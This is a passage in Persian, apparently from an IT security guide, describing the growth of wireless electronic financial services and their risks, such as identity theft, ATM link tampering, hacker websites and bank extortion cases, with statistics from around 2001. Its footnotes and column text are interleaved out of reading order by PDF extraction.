‫ﺑﻲﺳﻴﻢ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ .‬ﺍﻳﻦ ﺭﺳـﺎﻧﺔ‬
‫ﻧﺴﺒﺘﹰﺎ ﺟﺪﻳﺪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﺗﺒـﺪﻳﻞ ﺷـﺪﻥ ﺑـﻪ ﺭﺳـﺎﻧﺔ ﺍﺻـﻠﻲ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ‪ .‬ﺗﺤـﻮﻝ‬
‫ﻛﺴﺐ ﻭ ﻛﺎﺭﻫﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻏﺬﻱ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺴﻴﺎﺭ ﻋﻤﻴﻖ ﺑﻮﺩﻩ ﺍﺳـﺖ‪ .‬ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﺑـﺴﺘﺮ ﺍﻧـﻮﺍﻉ‬
‫ﺧﺪﻣﺎﺕ ﺍﺯ ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺑـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺎ ﺍﻣﻜـﺎﻥ‬
‫‪137‬‬
‫‪138‬‬
‫‪139‬‬
‫‪140‬‬
‫‪141‬‬
‫‪Electronic Funds Transfers‬‬
‫‪Electronic Data Interchange‬‬
‫‪Electronic Benefits Transfers‬‬
‫‪Electronic Trade Confirmation‬‬
‫‪Dr. Joseph N. Pelton, "Satellite‬‬
‫‪Communications 2001: The Transition to‬‬
‫‪Mass-Consumer Markets, Technologies, and‬‬
‫‪Systems".‬‬
‫‪142 Business To Business‬‬
‫‪143 Jupiter Communications, 2001‬‬
‫‪١٨٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﺛﺮﺍﺕ ﻣﻨﻔـﻲ ﺍﻳـﻦ ﭘﺪﻳـﺪﻩ ﻧﻴـﺰ‬
‫ﮔﺴﺘﺮﺵ ﻣﻲﻳﺎﺑﺪ‪.‬‬
‫ﺗﻮﺳﻌﺔ ﻣﺪﺍﻭﻡ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳـﺪ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﻣﺜﻞ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬـﺎ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﺑﻮﺟـﻮﺩ‬
‫ﺁﻭﺭﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ؛ ﺍﻣـﺎ‬
‫ﻧﻜﺘﻪ ﺍﻳﻨﺠﺎﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺍﻗﺘـﺼﺎﺩ ﺭﺳـﻤﻲ‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎ ﺍﻗﺘـﺼﺎﺩ ﺯﻳﺮﺯﻣﻴﻨـﻲ ﻭ ﻣﺠﺮﻣﺎﻧـﻪ‬
‫ﺟﻬﺎﻧﻲ ﻫﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺑﻪ ﺧﻮﺑﻲ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻭﻓﻖ ﺩﻫﺪ‪ .‬ﺍﺭﺍﺋﻪ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫‪144 Box 1 of "E-Finance in Emerging Markets: Is‬‬
‫‪Leapfrogging Possible?", Claessens S., T.‬‬
‫‪Glaessener, D. Klingebiel, 2001.‬‬
‫ﺏ‪ .‬ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﻓﻮﺍﻳﺪ ﺯﻳﺎﺩ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ‪ ،‬ﻣﺨﺎﻃﺮﺍﺗﻲ ﻫﻢ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ‬
‫ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺳـﺮﻗﺖ ﺭﺍ‬
‫ﻧﻴﺰ ﺗـﺴﻬﻴﻞ ﻣـﻲﻛﻨـﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺟﻌـﻞ ﻫﻮﻳـﺖ‪،‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭ ﭼﺎﭖ ﺗـﺼﺎﻭﻳﺮ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺑـﺎ ﻛﻴﻔﻴـﺖ‬
‫ﻋــﺎﻟﻲ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺑــﺴﺘﺮﻫﺎﻱ‬
‫ﭼﻨــﺪﻣﻨﻈﻮﺭﻩ ﺍﻧﺠــﺎﻡ ﺁﻧﻬــﺎ ﺭﺍ ﺗــﺴﻬﻴﻞ ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﺑــﺎ ﮔــﺴﺘﺮﺵ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ‪ ١٤٦‬ﻛﻪ ﺩﺭ ﻣﻨﺎﻃﻖ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻮﻝ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺑﺰﻫﻜﺎﺭﺍﻥ ﻗﺎﺩﺭﻧﺪ ﻛـﻪ‬
‫ﺍﺗﺼﺎﻝ ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻭ ﺑﺎﻧـﻚ ﻣـﺎﺩﺭ ﺭﺍ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﻮﺩﻩ ﻭ ﻛﻠﻴﺔ ﺗﺒـﺎﺩﻻﺕ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟـﻲ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﻨﺪ‪ .‬ﻫﻨﺮ ﻧﻔﻮﺫ ﺑﺮﺧﻂ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻳـﻚ‬
‫ﺗﺨﺼﺺ ﭘﻴﭽﻴﺪﻩ ﺑـﻮﺩ‪ ،‬ﺍﻣـﺎ ﻋـﺼﺮ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺯﻣﻴﻨـﻪ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﮔﺴﺘﺮﺵ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮﺯﻣﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ‪ -‬ﻛـﻪ‬
‫ﺍﻣﺮﻭﺯﻩ ﺑﺎ ﺍﺭﺍﺋﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲ ﻛﻨﻨـﺪ ‪-‬‬
‫ﻓــﺮﺍﻫﻢ ﻧﻤــﻮﺩﻩ ﺍﺳــﺖ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻣﺎﻧﻨــﺪ‬
‫‪ www.astalavista.box.sk‬ﻭ ﻳﺎ ‪www.attrition.org‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻣﺒﺘـﺪﻱ‬
‫ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧـﺪ‪ .‬ﺷـﺮﻛﺖ‬
‫‪ (www.idc.com) Internet Data Center‬ﺍﺧﻴـــﺮﹰﺍ ﺩﺭ‬
‫ﮔﺰﺍﺭﺷﻲ ﺍﻋﻼﻡ ﻛـﺮﺩﻩ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ ‪ %۵۷‬ﻛـﻞ ﺣﻤـﻼﺕ ﺳـﺎﻝ‬
‫ﮔﺬﺷﺘﻪ‪ ،‬ﻣﺘﻮﺟﻪ ﺑﺨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺳﻨﺘﻲ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺘﺤـﻮﻝ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﻃـﻮﻝ‬
‫ﺗﺎﺭﻳﺦ ﺗﺎ ﻛﻨﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻫﻤـﻮﺍﺭﻩ ﺷـﺎﻣﻞ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﺳﻨﺎﺩ ﭼـﺎﭘﻲ ﻳـﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻓـﺮﺍﺩ ﺑـﻮﺩﻩ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻣﺤـﻴﻂ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺻﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻗﺘـﺼﺎﺩﻱ ﺑﻮﺟـﻮﺩ‬
‫ﺁﻣــﺪﻩ ﺍﺳــﺖ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۱‬ﺑــﻴﺶ ﺍﺯ ﻳــﻚ ﭼﻬــﺎﺭﻡ )‪(%۲۷‬‬
‫‪١٤٧‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻭ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧـﺪ‪.‬‬
‫ﺑﺎﻧﺪﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺻﺪﻫﺎ ﺑﺎﻧـﻚ ﺭﺍ ﺩﺭ ﺳﺮﺗﺎﺳـﺮ‬
‫ﺟﻬﺎﻥ ﻣﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺟـﺮﺍﺋﻢ‬
‫‪ ۱۴۵‬ﻗﺴﻤﺖ ﺍﻭﻝ ﻛﺘﺎﺏ‪:‬‬
‫‪"E-Finance in Emerging Markets: Is‬‬
‫‪Leapfrogging Possible?", 2001.‬‬
‫ﺑﻪ ﻗﻠﻢ‪Claessens. S,T. Glaessner, D. Klingebiel‬‬
‫‪146 Dialup ATM‬‬
‫‪147 Evans Data Corp. Survey‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺳ ـﺘﮕﺎﻫﻬﺎﻱ ﺳــﻴﺎﺭ ﺍﻣــﺮﻭﺯﻩ ﺑﻌﻨــﻮﺍﻥ ﻟﺒــﺔ ﺩﺭﺣــﺎﻝ ﭘﻴــﺸﺮﻓﺖ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﻬﺎﻥ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۰‬ﺗﻨﻬﺎ ﻳﺎﺯﺩﻩ‬
‫ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺗﻤﺎﻡ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺷـﺖ‪ ١٤٤.‬ﺗـﺎ‬
‫ﺳﺎﻝ ‪ ۱۹۹۹‬ﻭ ﺑﺎ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺍﻳـﻦ ﺭﻗـﻢ ﺑـﻪ‬
‫ﭼﻴﺰﻱ ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻧﺼﺪ ﻣﻴﻠﻴﻮﻥ ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﻴﺰ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﺩﻭ ﺑﺮﺍﺑﺮ ﺁﻥ ﻣﻘﺪﺍﺭ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺭﺳﻲ ﺁﻣﺎﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺟﻬﺸﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ‬
‫ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺭﺍ ﺑﺨـﻮﺑﻲ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ‪ ١٤٥.‬ﻛـﺸﻮﺭ ﻛــﺎﻣﺒﻮﺝ‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﭘﺲ ﺍﺯ ﺣﺪﻭﺩ ‪ ۲۰‬ﺳﺎﻝ ﺟﻨﮓ ﺷـﻬﺮﻱ ﺷـﺒﻜﺔ ﺧﻄـﻲ‬
‫ﺛﺎﺑﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﻮﺩ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ‬
‫ﺗﻮﺍﻧﺴﺖ ﺑﺎﺭ ﺩﻳﮕـﺮ ﺍﺗـﺼﺎﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ‪ .‬ﺩﺭ ﺧـﻼﻝ‬
‫ﻳﻜﺴﺎﻝ ﺑﻌﺪ ﺍﺯ ﺁﻏﺎﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺗﻌﺪﺍﺩ ﻣﺸﺘﺮﻛﺎﻥ‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺗﻠﻔﻨﻬﺎﻱ ﺛﺎﺑﺖ ﭘﻴﺸﻲ ﮔﺮﻓﺖ‪ .‬ﻛﺎﻣﺒﻮﺝ‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﻛﻤﺘﺮﻳﻦ ﺩﺭﺁﻣـﺪﻫﺎﻱ ﺳـﺮﺍﻧﺔ ﺩﻧﻴـﺎ ﺭﺍ ﺩﺍﺭﺩ‪ ،‬ﺩﺭ‬
‫ﺯﻣﻴﻨﺔ ﮔﺴﺘﺮﺵ ﻋﻤﻮﻣﻲ ﺗﻠﻔﻦ ﺍﺯ ‪ ۳۱‬ﻛﺸﻮﺭ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ﺑﻌـﻀﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﻛﻪ ﺩﺭﺁﻣﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺁﻥ ﺩﺍﺭﻧﺪ ‪ -‬ﭘﻴـﺸﻲ ﮔﺮﻓﺘـﻪ‬
‫ﺍﺳﺖ‪ .‬ﻛﺸﻮﺭﻫﺎﻱ ﺩﻧﻴﺎ ﺑﺠﺎﻱ ﺻﺮﻑ ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻥ ﻣﻨﺎﺑﻊ ﻭ ﺯﻣﺎﻥ‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧﻄﻲ ﺛﺎﺑﺖ ﺟﻬﺖ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪،‬‬
‫ﺍﻳﻦ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﺑﺎ ﺑﺮﺟﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﻛـﻪ‬
‫ﺗﻮﻟﻴﺪ ﺁﻧﻬﺎ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﺍﺳـﺖ ﺟـﺎﻳﮕﺰﻳﻦ ﻧﻤـﻮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﺍﻳـﻦ‬
‫ﺗﺤﻮﻻﺕ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪﻱ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺷـﺘﻪ ﻛـﻪ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺟﺪﻱ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗﺒﺎﺩﻝ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺟﻌﻠـﻲ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺧـﺎﺫﻱ‬
‫ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪١٨٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻧﻔﻮﺫ ﺑﻌﻨﻮﺍﻥ ﻣﺪﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﻣﻄﺮﺡ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ FBI‬ﺍﻋﻼﻡ ﻛﺮﺩﻩ ﻛـﻪ ﺍﻛﺜـﺮ ﺑﺎﻧﻜﻬـﺎ ﺑـﻪ‬
‫ﻋﻠــﺖ ﺗــﺮﺱ ﺍﺯ ﺑــﻲﺁﺑﺮﻭﻳــﻲ ﻭ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻥ ﻣــﺸﺘﺮﻳﺎﻥ‪ ،‬ﺑــﺎﺝ‬
‫ﻣﻲ ﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺍﺧﺎﺫﻱ ‪ Egghead‬ﺩﺭ ﺳﺎﻝ ﮔﺬﺷـﺘﻪ ﻳـﻚ ﻧﻤﻮﻧـﺔ‬
‫ﻣﺸﻬﻮﺭ ﺍﺳﺖ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺷـﺎﻣﻞ ﺩﻩ‬
‫ﻫﺰﺍﺭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻧـﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻨﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻨﺘﺸﺮ ﻧﻜﻨﻨﺪ ﻣﺒﻠﻎ‬
‫ﮔﺰﺍﻓﻲ ﺭﺍ ﺍﺯ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑﺎﺝﺧﻮﺍﻫﻲ ﻛﺮﺩﻧﺪ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺁﻥ ﻧﻴـﺰ ﺩﺭ‬
‫ﺷﺐ ﻛﺮﻳﺴﻤﺲ ﺍﺯ ﻣﻮﺟـﻮﺩﻱ ﻫـﺮ ﻛـﺎﺭﺕ ﻣﺒﻠـﻎ ﻛـﻮﭼﻜﻲ ﻛـﻢ‬
‫ﻛﺮﺩﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﻜﻞ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺎﻟﻲ ﻭ ﺣﻴﺜﻴﺘـﻲ ﺍﺳـﺖ‪.‬‬
‫ﻳﻚ ﭘﻴﺶ ﺑﻴﻨﻲ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳﻦ ﺍﻣـﺮ ﺍﺳـﺖ ﻛـﻪ ﺣـﻮﺍﺩﺙ ﺳـﺮﻗﺖ‬
‫ﻫﻮﻳﺖ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑـﻴﺶ ﺍﺯ ﺳـﻪ ﺑﺮﺍﺑـﺮ ﺧﻮﺍﻫـﺪ ﺷـﺪ ﻭ ﺍﺯ‬
‫‪ ۷۰۰,۰۰۰‬ﺩﻻﺭ‪ ١٤٨‬ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ ‪ ۱،۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ‬
‫‪ ۲۰۰۵‬ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ؛ ﻭ ﻫﺰﻳﻨـﺔ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﻫـﻢ ﺑـﺎ‬
‫ﺍﻓﺰﺍﻳﺶ ‪ %۳۰‬ﺍﺯ ﻣـﺮﺯ ‪ ۸‬ﻣﻴﻠﻴـﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۵‬ﺧﻮﺍﻫـﺪ‬
‫‪١٤٩‬‬
‫ﮔﺬﺷﺖ‪.‬‬
‫ﺟــﺮﺍﺋﻢ ﺳــﺎﻳﺒﺮ ﺭﺷــﺪ ﭼــﺸﻢﮔﻴــﺮﻱ ﺩﺍﺷــﺘﻪ ﺍﺳــﺖ‪ .‬ﺣﻤﻠــﻪ ﺑــﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻧﺴﺒﺖ ﺑﻪ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺩﻭ ﺑﺮﺍﺑﺮ‬
‫ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ‪ %۹۰‬ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘﻨـﺪ‬
‫ﻋﻠﻴـﺮﻏﻢ ﺑﺮﺧـﻮﺭﺩﺍﺭﻱ ﺍﺯ ﺍﻧـﻮﺍﻉ ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ‪ ،‬ﺑـﻪ ﻭﻳﺮﻭﺳــﻬﺎ ﻭ‬
‫ﻛﺮﻣﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻟﻮﺩﻩ ﺷـﺪﻩ ﺑﻮﺩﻧـﺪ‪ ١٥٠.‬ﺗﺤﻘﻴـﻖ ﺳـﺎﻝ ‪۲۰۰۱‬‬
‫‪ CSI/FBI‬ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺘـﻲ ﻧـﺸﺎﻥ ﺩﺍﺩ ﻛـﻪ‬
‫ﺑﺪﻟﻴﻞ ﻧﻔﻮﺫﻫﺎ ﺑﻴﺶ ﺍﺯ ‪ ۳۷۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺑﻪ ﺑـﺎﺭ ﺁﻣـﺪﻩ‬
‫‪١٥١‬‬
‫ﺍﺳﺖ‪.‬‬
‫ﺩﻟﻴﻞ ﺍﺻﻠﻲ ﻋﺪﻡ ﺑﺮﺧﻮﺭﺩ ﻣﻨﺎﺳﺐ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﺣـﻮﺍﺩﺙ ﺩﺭ ﺩﻧﻴـﺎ‬
‫ﺗﺮﺱ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺁﻧﻬـﺎ ﺍﺳـﺖ‪ ١٥٢.‬ﺷـﺮﻛﺘﻬﺎﻱ ﻣـﺎﻟﻲ ﺑـﺪﻟﻴﻞ‬
